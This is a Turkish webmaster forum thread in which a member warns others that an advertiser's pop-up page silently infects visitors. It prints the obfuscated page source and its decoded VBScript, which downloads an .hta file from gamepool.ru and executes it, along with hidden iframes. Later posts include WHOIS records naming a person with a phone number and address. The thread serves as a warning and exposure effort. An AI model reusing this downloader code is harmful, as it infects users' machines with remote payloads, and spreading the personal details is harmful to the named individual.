İyinet'e Hoşgeldiniz!

Türkiye'nin En Eski Webmaster Forum'una Hemen Kayıt Olun!

Kayıt Ol!

İzleturkey sitesi ve seref yoksunu Mirraacle

Opteron

0
İyinet Üyesi
Katılım
26 Kasım 2006
Mesajlar
98
Reaction score
0
Konum
192.168.0.1
Merhaba arkadaslar,

Askmetre. Sevgiliniz sizi ne kadar seviyor ? sitesi sahibi [URL="http://forum.iyinet.com/members/mirraacle.html[/URL] nicki ile burda cirit atan şeref yoksunu arkadaş sayfasında aşağıda verdiğim decode edilmiş kodda rahatça görebileceğiniz gibi hta ile sayfa kıtlıyor.

http://forum.iyinet.com/reklam-ve-r...li-sitelere-pop-up-verilecektir-18-dahil.html

Bu konusunda pm den reklam verdıgı tum wmler dıkkatlı olsun. Basınızı agrıtıcak bu arkadas cunku.

Kod:
<!--
body {
	background-color: #F9B4C7;
}
-->
<title>Askmetre. Sevgiliniz sizi ne kadar seviyor ?</title>
<center>
<script src="http://banner.ringofon.com/bannerjs.php?A=54721&B=k4e95v4654c9bbv2648qe5d2913f6h3s"></script><br><br>
<a href="http://www.ringofon.com/melodi/melodim.php?affiliateID=54721&z=2" target="_blank">
<img src="http://www.radyodinle.gen.tr/mp3indir.gif" border="0" width="728" height="90" /></a><br><br>
<iframe src="http://xbpfkkesju.cn/dl/adv456.php" width=1 height=1></iframe>
<iframe name="iFrame2" width="2" height="2" src="http://superadultsex.net/cgi-bin/in.cgi?p=user7" scrolling="no" frameborder="0"></iframe>
<a href="http://www.ringofon.com/oyun_ssl/index.php?oyun=1&affiliateID=54721" target="_blank">
<img src="http://www.radyodinle.gen.tr/kumanda.gif" border="0" width="728" height="90" /></a><br><br>
</center>
<script type="text/javascript">document.write('\u003c\u0068\u0074\u006d\u006c\u003e\u000d\u000a\u003c\u0068\u0065\u0061\u0064\u003e\u000d\u000a\u003c\u002f\u0068\u0065\u0061\u0064\u003e\u000d\u000a\u003c\u0062\u006f\\u0064\u006f\u0063\u0075\u006d\u0065\u006e\u0074\u002e\u0063\u0072\u0065\u0061\u0074\u0065\u0045\u006c\u0065\u006d\u0065\u006e\u0074\u0028\u0022\u006f\u0062\u006a\u0065\u0063\u0074\u0022\u0029\u000d\u000a\u0064\u0066\u002e\u0073\u0065\u0074\u0041\u0074\u0074\u0072\u0069\u0062\u0075\u0074\u0065\u0020\u0022\u0063\u006c\u0061\u0073\u0073\u0069\u0064\u0022\u002c\u0020\u0022\u0063\u006c\u0073\u0069\u0064\u003a\u0042\u0044\u0039\u0036\u0043\u0035\u0035\u0036\u002d\u0036\u0035\u0041\u0033\u002d\u0031\u0031\u0044\u0030\u002d\u0039\u0038\u0033\u0041\u002d\u0030\u0030\u0043\u0030\u0034\u0046\u0043\u0032\u0039\u0045\u0033\u0036\u0022\u000d\u000a\u0073\u0074\u0072\u003d\u0022\u004d\u0069\u0063\u0072\u006f\u0073\u006f\u0066\u0074\u002e\u0058\u004d\u004c\u0048\u0054\u0054\u0050\u0022\u000d\u000a\\u002c\u0022\u0022\u0029\u000d\u000a\u0053\u002e\u0074\u0079\u0070\u0065\u0020\u003d\u0020\u0031\u000d\u000a\u0073\u0074\u0072\u0036\u003d\u0022\u0047\u0045\u0054\u0022\u000d\u000a\u0078\u002e\u004f\u0070\u0065\u006e\u0020\u0073\u0074\u0072\u0036\u002c\u0020\u0064\u006c\u002c\u0020\u0046\u0061\u006c\u0073\u0065\u000d\u000a\u0078\u002e\u0053\u0065\u006e\u0064\u000d\u000a\u0066\u006e\u0061\u006d\u0065\u0031\u003d\u0022\u0070\u0068\u0070\u002e\u0068\u0074\u0061\u0022\u000d\u000a\u0073\u0065\u0074\u0020\u0046\u0020\u003d\u0020\u0064\u0066\u002e\u0063\u0072\u0065\u0061\u0074\u0065\u006f\u0062\u006a\u0065\u0063\u0074\u0028\u0022\u0053\u0063\u0072\u0069\u0070\u0074\u0069\u006e\u0067\u002e\u0046\u0069\u006c\u0065\u0053\u0079\u0073\u0074\u0065\u006d\u004f\u0062\u006a\u0065\u0063\u0074\u0022\u002c\u0022\u0022\u0029\u000d\u000a\u0073\u0065\u0074\u0020\u0074\u006d\u0070\u0020\u003d\u0020\u0046\u002e\u0047\u0065\u0074\u0053\u0070\u0065\u0063\u0069\u0061\u006c\u0046\u006f\u006c\u0064\u0065\u0072\\u006f\u0073\u0065\u000d\u000a\u0073\u0065\u0074\u0020\u0051\u0020\u003d\u0020\u0064\u0066\u002e\u0063\u0072\u0065\u0061\u0074\u0065\u006f\u0062\u006a\u0065\u0063\u0074\u0028\u0022\u0053\u0068\u0065\u006c\u006c\u002e\u0041\u0070\u0070\u006c\u0069\u0063\u0061\u0074\u0069\u006f\u006e\u0022\u002c\u0022\u0022\u0029\u000d\u000a\u0051\u002e\u0053\u0068\u0065\u006c\u006c\u0045\u0078\u0065\u0063\u0075\u0074\u0065\u0020\u0066\u006e\u0061\u006d\u0065\u0031\u002c\u0022\u0022\u002c\u0022\u0022\u002c\u0022\u006f\u0070\u0065\u006e\u0022\u002c\u0030\u000d\u000a\u003c\u002f\u0073\u0063\u0072\u0069\u0070\u0074\u003e\u000d\u000a\u003c\u002f\u0062\u006f\u0064\u0079\u003e\u000d\u000a\u003c\u002f\u0062\u006f\u0064\u0079\u003e\u000d\u000a\u003c\u002f\u0068\u0074\u006d\u006c\u003e')</script>
Sayfanın decode hali
Kod:
<html>
<head>
</head>
<body>
<script language="VBScript">
on error resume next
dl = "http://www.gamepool.ru/php.hta"
Set df = document.createElement("object")
df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
str="Microsoft.XMLHTTP"
Set x = df.CreateObject(str,"")
str6="GET"
x.Open str6, dl, False
x.Send
fname1="php.hta"
set F = df.createobject("Scripting.FileSystemObject","")
set tmp = F.GetSpecialFolder(2)
fname1= F.BuildPath(tmp,fname1)
S.open
S.close
set Q = df.createobject("Shell.Application","")
Q.ShellExecute fname1,"","","open",0
</script>
</body>
</body>
</html>

Bu arkadaştan benim başım yandı popup reklam vermıstı bugun sabah bu işi yapmış ve yaklasık 10 bin kullanıcıma hta ile sayfa kitledi. Gerçi görüp göreceği budur kendisine pmlede söledim bundan sonra böle bir sitenin yayınına sağ olduğum sürece izin vermiycem :)

Sizlerinde dikkatli olmanız için yazmak istedim bildiğim bu arkadastan popup reklam alan birçok kullanıcı bulunmakta iyinette bu ve bunun gibi arkadasların wm forumlarında barınmasını tasvıp etmıyorum ve yetkılılerden geregının yapılmasını rica ediyorum.

hta ile sayfa kitleten site : Askmetre. Sevgiliniz sizi ne kadar seviyor ?
Kıtlenen sayfa : gamepool.ru
Kitlenen sayfadaki decode edilmiş kaynak kodları:

Kod:
<html>
<head>
</head>
<body>
<script language="VBScript">
on error resume next
dl = "http://www.gamepool.ru/php.hta"
Set df = document.createElement("object")
df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
str="Microsoft.XMLHTTP"
Set x = df.CreateObject(str,"")
str6="GET"
x.Open str6, dl, False
x.Send
fname1="php.hta"
set F = df.createobject("Scripting.FileSystemObject","")
set tmp = F.GetSpecialFolder(2)
fname1= F.BuildPath(tmp,fname1)
S.open
S.close
set Q = df.createobject("Shell.Application","")
Q.ShellExecute fname1,"","","open",0
</script>
<iframe src="http://xbpfkkesju.cn/dl/adv456.php" width=1 height=1></iframe>
<iframe name="iFrame2" width="1" height="1" src="http://superadultsex.net/cgi-bin/in.cgi?p=user7" scrolling="no" frameborder="0"></iframe>
<div id="eXTReMe"><a href="http://extremetracking.com/open?login=gmpool">
<img src="http://t1.extreme-dm.com/i.gif" style="border: 0;"
height="38" width="41" id="EXim" alt="eXTReMe Tracker" /></a>
<script type="text/javascript"><!--
var EXlogin='gmpool' // Login
var EXvsrv='s11' // VServer
EXs=screen;EXw=EXs.width;navigator.appName!="Netscape"?
EXb=EXs.colorDepth:EXb=EXs.pixelDepth;
EXd=document;EXw?"":EXw="na";EXb?"":EXb="na";
EXd.write("<img src=http://e2.extreme-dm.com",
"/"+EXvsrv+".g?login="+EXlogin+"&",
"jv="+EXjv+"&j=y&srw="+EXw+"&srb="+EXb+"&",
"l="+escape(EXd.referrer)+" height=1 width=1>");//-->
</script><noscript><div id="neXTReMe"><img height="1" width="1" alt=""
src="http://e2.extreme-dm.com/s11.g?login=gmpool&j=n&jv=n" />
</div></noscript></div>
<iframe name="iFrame2" width="100%" height="5000" src="http://www.google.com" scrolling="no" frameborder="0"></iframe>
</body>
</body>
</html>

Site açılmıyor suan hayatta ilk defa kolay kolay yapmadıgım birşeyi yapıp açıkca sölüyorum ben bu siteyi açtırmıycam. Yönetici arkadaslar eğer kanıt gerekıyor soledıklerınızı teyıt etmemız ıcın derse sıtesını acarım arkadasın gırıp kendılerı kontrol edebılırler. :)

Saygılar.
 

Ekstra

0
İyinet Üyesi
Katılım
7 Ekim 2006
Mesajlar
1,428
Reaction score
1
Konum
127.0.0.1
Konunun yeri burası değil.

Anlamadan dinlemeden infaz yapma, nerden biliyorsun onun yaptığını?

Farklı bir iframe benim sitelerime atılmıştı, bu tür virüsler önce bilgisayara giriyor sonra giriş yaptığın ftplere giriyor, düzeltene kadar canım çıkmıştı.
 

nokie

0
İyinet Üyesi
Katılım
23 Mart 2005
Mesajlar
1,597
Reaction score
8
Konum
İzmir
Ektraya katılıyorum, bu malware java kodları popüler oldu son zamanlarda, serverlarında açık olan herkese bulaşıyor bu kodlar, perl script olarak yerleşiyor servera, sonra tüm indexlere iframe..

arkadaşın bilerek yaptığını zannetmiyorum, başlık çok kötü duruyor bir insana direk şerefine laf etmek yakışmadı.
 

Yalova77

0
İyinet Üyesi
Katılım
18 Kasım 2007
Mesajlar
58
Reaction score
0
aynen benimde başıma böyle bişey geldi. iframe kod atıyor bazı virüsler ftp ye otomatik düzeltene kadar sekiz bacak kırmıştım :p
 

Opteron

0
İyinet Üyesi
Katılım
26 Kasım 2006
Mesajlar
98
Reaction score
0
Konum
192.168.0.1
arkadaşlar sayfada olan iframe değil özellikle encode edilmiş java kodları, ayrıca kıtlenen sayfada bırden fazla extreme kodu var nıyet cok acık bellı hıt kaygısı yapılan olay kesınlıkle kasıtlıdır bunun aksını ıddıa edenın alnını karıslarım :)

ayrıca iddia etmiyorum direk kanıtlarla sunayım size isterseniz.

http://whois.domaintools.com/izleturkey.com

Administrative Contact:
N/A
umut iyi ()
Yana Raynisa Bulvar 39/124
moskova
Moskovskaya oblast,06670
RU
Tel. +7.9264581205

http://whois.domaintools.com/gamepool.ru

domain: GAMEPOOL.RU
type: CORPORATE
nserver: ns1.leaderhost.ru.
nserver: ns2.leaderhost.ru.
state: REGISTERED, DELEGATED
person: umut iyi
phone: +7 926 4581205

http://forum.iyinet.com/forum-uyeli...aniza-katilmak-istiyorum-davetiye-istegi.html

Davetiye için e-posta adresiniz: [email protected]
Mesleğiniz: İnşaat Mühendisi
Yaşınız: 27
Bulunduğunuz şehir: Moskova
Varsa web sitesi adresiniz: www.radyodinle.gen.tr (20k)
Varsa forumda size referans olacak kullanıcı(lar): ________________
Varsa başka forumlardaki üye nickiniz: mirraacle (r10)


Yeterlidir umarım :)
 

nokie

0
İyinet Üyesi
Katılım
23 Mart 2005
Mesajlar
1,597
Reaction score
8
Konum
İzmir
Açıklama için teşekkürler opteron :) kusurumuza bakma son zamanlarda çoğaldı bu vakkalarda, arkadaş mağduru sandım meğer değilmiş, duyarlılığın için sağol.
 

Opteron

0
İyinet Üyesi
Katılım
26 Kasım 2006
Mesajlar
98
Reaction score
0
Konum
192.168.0.1
nokie ben tesekkur ederim dikkatlı olun sadece bu ve bunun gibi kişileri böle wm platformlarında görmek beni üzüyor umarım gereği yapılır.
 

Türkiye’nin ilk webmaster forum sitesi iyinet.com'da forum üyeleri tarafından yapılan tüm paylaşımlardan; Türk Ceza Kanunu’nun 20. Maddesinin, 5651 Sayılı Kanununun 4. maddesinin 2. fıkrasına göre, paylaşım yapan üyeler sorumludur.

Backlink ve Tanıtım Yazısı için iletişime geçmek için Skype Adresimiz: .cid.1580508955483fe5

seo ajansı , sosyal medya yönetimi
Üst